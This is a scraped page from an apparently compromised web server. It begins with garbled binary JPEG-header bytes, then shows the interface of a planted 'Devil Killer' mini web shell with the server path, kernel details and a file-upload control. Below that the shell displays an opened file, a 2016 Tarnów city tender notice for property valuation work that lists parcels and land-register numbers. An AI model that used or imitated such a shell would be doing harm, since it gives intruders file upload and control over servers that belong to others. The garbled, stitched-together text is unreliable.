JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161107/337609-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.malopolska.pl/umtarnow/' target='_blank'>http://bip.malopolska.pl/umtarnow/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 337609 - 2016
              z dnia 2016-11-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Tarnów: Wykonanie operatów szacunkowych określających wartość rynkową nieruchomości, wartość rynkową prawa własności i prawa użytkowania wieczystego oraz wartość gruntu wraz z jego częściami składowymi.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miasta Tarnowa - Urząd Miasta Tarnowa - Wydział Gospodarowania Mieniem, krajowy numer identyfikacyjny
              64811000000, ul.
              ul. Nowa 
              3,
              33100  
              Tarnów, woj.
              małopolskie, państwo
              Polska, tel.
              146 882 762, e-mail
              , faks
              146 882 771.
              <br />
              Adres strony internetowej (URL): www.tarnow.pl, http://bip.malopolska.pl/umtarnow/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.malopolska.pl/umtarnow/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie<br />
                Adres:
                <br />Adres pocztowy: Urząd Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 4, parter sala 1 - Kancelaria Główna w Wydziale Organizacyjnym.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie operatów szacunkowych określających wartość rynkową nieruchomości, wartość rynkową prawa własności i prawa użytkowania wieczystego oraz wartość gruntu wraz z jego częściami składowymi.<br /><b>Numer referencyjny: </b>WGM.271.22.2016/SA<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie nr 1
Wykonanie dwóch operatów szacunkowych określających wartość rynkową prawa własności nieruchomości gruntowych oraz prawa użytkowania wieczystego nieruchomości gruntowych, stanowiących własność Gminy Miasta Tarnowa. Operaty szacunkowe sporządzane są w celu przekształcenia prawa użytkowania wieczystego w prawo własności i dotyczy nieruchomości oznaczonych jako:
1) działki nr 88/6 i 89/2 obrębu 232 o łącznej powierzchni 1901 m2 objęte księgą wieczystą nr TR1T/00067962/4, zabudowane budynkiem wielomieszkaniowym,
2) działka nr 92/24 obrębu 109 o powierzchni 20 m2 objęta księgą wieczystą nr TR1T/00046723/4, zabudowana garażem.
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Zadanie nr 2
Wykonanie jednego operatu szacunkowego określającego wartość rynkową niezabudowanej nieruchomości, stanowiącej własność Gminy Miasta Tarnowa, położonej w Tarnowie w rejonie ul. Równoległej w obrębie 287 oznaczonej jako działka nr 13/6 o powierzchni 656 m2, objętej księgą wieczystą nr TR1T/00145130/4. Wyceniana nieruchomość nie ma dostępu do drogi publicznej, zgodnie z miejscowym planem zagospodarowania terenu leży w obszarze oznaczonym symbolem 2.MN.PG.6 - tereny zabudowy mieszkaniowej jednorodzinnej, znajdujące się w terenie górniczym złoża gazu ziemnego. W celu zabudowy niezbędne jest uzyskanie dostępu do drogi publicznej. Wyceniana nieruchomość jest przeznaczona do zbycia w trybie przetargu ustnego nieograniczonego
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Zadanie nr 3
Wykonanie dziesięciu operatów szacunkowych określających wartość rynkową niezabudowanych nieruchomości przejętych na rzecz Gminy Miasta Tarnowa z mocy prawa na podstawie art. 98 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2015 r. poz. 1774) - przeznaczonych zgodnie z miejscowym planem zagospodarowania terenu pod drogi publiczne, celem ustalenia wysokości należnego odszkodowania i dotyczy nieruchomości oznaczonych jako:
1) działki nr 178/6 i 178/9 obrębu 200 objęte księgą wieczystą nr TR1T/00036096/6,
2) działka nr 22/10 obrębu 98 objęta księgą wieczystą nr TR1T/00097540/9,
3) działki nr 131/7 i 131/5 obrębu 73 objęte księgą wieczystą nr TR1T/00032938/3,
4) działki nr 50/25 i 50/28 obrębu 155 objęte księgą wieczystą nr TR1T/00070496/0,
5) działka nr 106/6 obrębu 199 objęta księgą wieczystą nr TR1T/00123869/3,
6) działka nr 5/2 obrębu 172 objęta księgą wieczystą nr TR1T/00000653/8,
7) działka nr 6/2 obrębu 172 objęta księgą wieczystą nr TR1T/00000654/5,
8) działka nr 460/1 obrębu 4 objęta księgą wieczystą nr TR1T/00024409/7,
9) działka nr 95/20 obrębu 73 objęta księgą wieczystą nr TR1T/00037726/9,
10) działka nr 14/72 obrębu 325 objęta księgą wieczystą nr TR1T/00096638.
Z wizji na nieruchomości należy sporządzić stosowny protokół. Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Zadanie nr 4
Wykonanie jednego operatu szacunkowego określającego wartość rynkową niezabudowanej nieruchomości stanowiącej własność Gminy Miasta Tarnowa położonej w Tarnowie przy ul. Sienkiewicza, oznaczonej jako działka nr 20/1 obrębu 281 o powierzchni 47 m2 objętej księgą wieczystą nr TR1T/00007424/3. Nieruchomość przeznaczona jest do zbycia w trybie przetargu ustnego ograniczonego na poprawienie warunków zagospodarowania nieruchomości przyległych - działek położonych w obrębie 281 nr 5 (czterech współwłaścicieli), nr 20/6 (jeden właściciel) i nr 21/16 (jeden właściciel), jako uzupełniająca do nieruchomości przyległych.
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Zadanie nr 5
Wykonanie dwudziestu dwóch operatów szacunkowych określających wartość gruntu wraz z jego częściami składowymi posiadającymi opisy szczegółowe, w celu ustalenia wysokości odszkodowania zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2013 r. poz. 687, z późn. zm.) oraz § 36 ust. 1 rozporządzenia Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109, z późn. zm.). 
Przedmiotowe działki przeszły na rzecz Gminy Miasta Tarnowa na podstawie decyzji Prezydenta Miasta Tarnowa z dnia 30 sierpnia 2016 r. znak: 2/D/2016 o zezwoleniu na realizację inwestycji drogowej pn.: Rozbudowa ulic Spokojne, Elektrycznej, Wyszyńskiego i Czystej w Tarnowie. Wyceny należy dokonać na dzień wydania decyzji. Wycena dotyczy następujących nieruchomości:
Lp.	Obręb	Nr działki przed podziałem	Nr działki po podziale	Powierzchnia [m2]	Księga wieczysta
1.	79	156/4	156/22	518	TR1T/00127306/7
	79	156/14	156/20	51	
2.	79	156/9	156/24	306	TR1T/00078917/4
3.	79	156/13	156/18	103	TR1T/00032986/4
	79	136/9	136/12	317	
4.	79	160/2		26	TR1T/00004664/6
5.	79	178/9		24	TR1T/00056659/7
	106	1/15	1/85	99	
6.	79	158/1		3774	TR1T/00035682/4
	79	158/2		155	
	79	160/1		2143	
	79	178/2		210	
7.	79	165/8		120	TR1T/00055680/6
8.	79	178/8		38	TR1T/00087200/1
	106	1/9	1/97	188	
9.	79	165/14		1888	TR1T/00125478/9
10.	94	86	86/1	762	TR1T/00004894/7
11.	106	1/10		22	TR1T/00004053/0
12.	106	1/66		241	TR1T/00103476/5
	106	1/62	1/93	65	
	106	1/67	1/95	485	
13.	106	1/59		52	TR1T/00076824/1
14.	106	69/1		157	TR1T/00041483/4
15.	106	1/13	1/81	168	TR1T/00056657/3
16.	106	1/33	1/87	58	TR1T/00076829/6
17.	106	1/14	1/83	120	TR1T/00056658/0
18.	106	71/8	71/16	447	TR1T/00097051/4
19.	106	1/60	1/91	110	TR1T/00103183/4
20.	106	69/2	69/6	128	TR1T/00119506/0
21.	107	4/6		121	TR1T/00079349/8
	107	4/7		70	
	107	3/3		381	
	107	2/11	2/33	1126	
22.	107	3/8		972	TR1T/00006547/4
	107	4/10		1054	
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Zadanie nr 6
Wykonanie czternastu operatów szacunkowych określających wartość gruntu wraz z jego częściami składowymi posiadającymi opisy szczegółowe, w celu ustalenia wysokości odszkodowania zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2013 r. poz. 687, z późn. zm.) oraz § 36 ust. 1 rozporządzenia Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109, z późn. zm.). 
Przedmiotowe działki przeszły na rzecz Gminy Miasta Tarnowa na podstawie decyzji Prezydenta Miasta Tarnowa z dnia 4 sierpnia 2016 r. znak: WAB.III.6740.18.2016.TK o zezwoleniu na realizację inwestycji drogowej pn.: Budowa ulicy Murarskiej z przebudową infrastruktury technicznej (w tym budowa kanalizacji opadowej do potoku Strusinka) w Tarnowie. Wyceny należy dokonać na dzień wydania decyzji. Wycena dotyczy następujących nieruchomości:
Lp.	Obręb	Nr działki przed podziałem	Nr działki po podziale	Powierzchnia [m2]	Księga wieczysta
1	265	51	51/1	38	TR1T/00004319/3
2		58/3	58/8	155	TR1T/00011351/1
3		60/4	60/4	295	TR1T/00076214/2
4		61/2	61/9	159	TR1T/00053842/6
5		62/6	62/6	190	TR1T/00145265/9
6		36	36/4	12	TR1T/00117507/3
7		37/3	37/13	14	TR1T/00038369/5
8		37/4	37/11	9	TR1T/00046151/3
9		37/2	37/9	13	TR1T/00044156/4
10		67/2	67/3	20	TR1T/00081239/1
11		68/1	68/11	36	TR1T/00054096/8
12		68/5	68/9	10	TR1T/00058650/8
13		45	45/1	162	TR1T/00102152/1
14		63	63/1	31	TR1T/00011356/6
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.<br /><br /><b>II.5) Główny kod CPV: </b>71319000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              9308.94<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 21<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający będzie punktował skrócenie terminu wykonania zamówienia.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej jeżeli wykaże, że dysponuje lub będzie dysponować osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług: 
W przypadku składania oferty na zadanie nr 1, nr 2, nr 3, nr 4 nr 5, nr 6 minimum jedną osobą z uprawnieniami rzeczoznawcy majątkowego w zakresie szacowania nieruchomości, o których mowa w art. 174 ust. 2 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz.U. z 2015 r. poz. 1774 z późn. zm.) lub odpowiadającymi im uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów. Wymaga się, aby osoba ta posiadała doświadczenie w zakresie sporządzania operatów szacunkowych  ilość operatów szacunkowych, które osoba wykonała  minimum 5.
Ze względu na możliwość złożenia oferty na SZEŚĆ zadań, dopuszcza się dublowanie osób na poszczególne zadania.
W przypadku Wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub Europejskiego Porozumienia o Wolnym Handlu (EFTA)  stronach umowy o Europejskim Obszarze Gospodarczym, na zasadach określonych w art. 193 ust. 2 ustawy o gospodarce nieruchomościami z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.2016.65).<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Przed udzieleniem zamówienia, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w terminie 7 dni, aktualnego na dzień złożenia dokumentu potwierdzającego okoliczności, o których mowa w art. 25 ust. 1 ustawy, a uszczegółowionych w rozdz. III.1.3), tj.:
wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji, doświadczenia zawodowego niezbędnego do wykonania zamówienia publicznego (liczba wykonanych usług), a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając w oryginale zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
2. Ewentualne pełnomocnictwa złożone do przetargu mają być podpisane przez osobę upoważnioną do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy bądź członków konsorcjum. Pełnomocnictwo należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie. Pełnomocnictwo w sposób jednoznaczny ma określać do jakich czynności upoważniona jest osoba (zgodnie z wyrokiem Sądu Okręgowego w Warszawie z dnia 31.01.2007 r., sygn. Akt V Ca 85/07).</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium w wysokości:
Zadanie nr 1: 10,00 zł (słownie: dziesięć złotych)
Zadanie nr 2: wadium nie jest wymagane
Zadanie nr 3: 70,00 zł (słownie: siedemdziesiąt złotych)
Zadanie nr 4: wadium nie jest wymagane
Zadanie nr 5: 100,00 zł (słownie: sto złotych
Zadanie nr 6: 60,00 zł (słownie: sześćdziesiąt złotych
2. Wykonawca może wnieść wadium w formach określonych w art. 45 ust. 6 ustawy Pzp.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
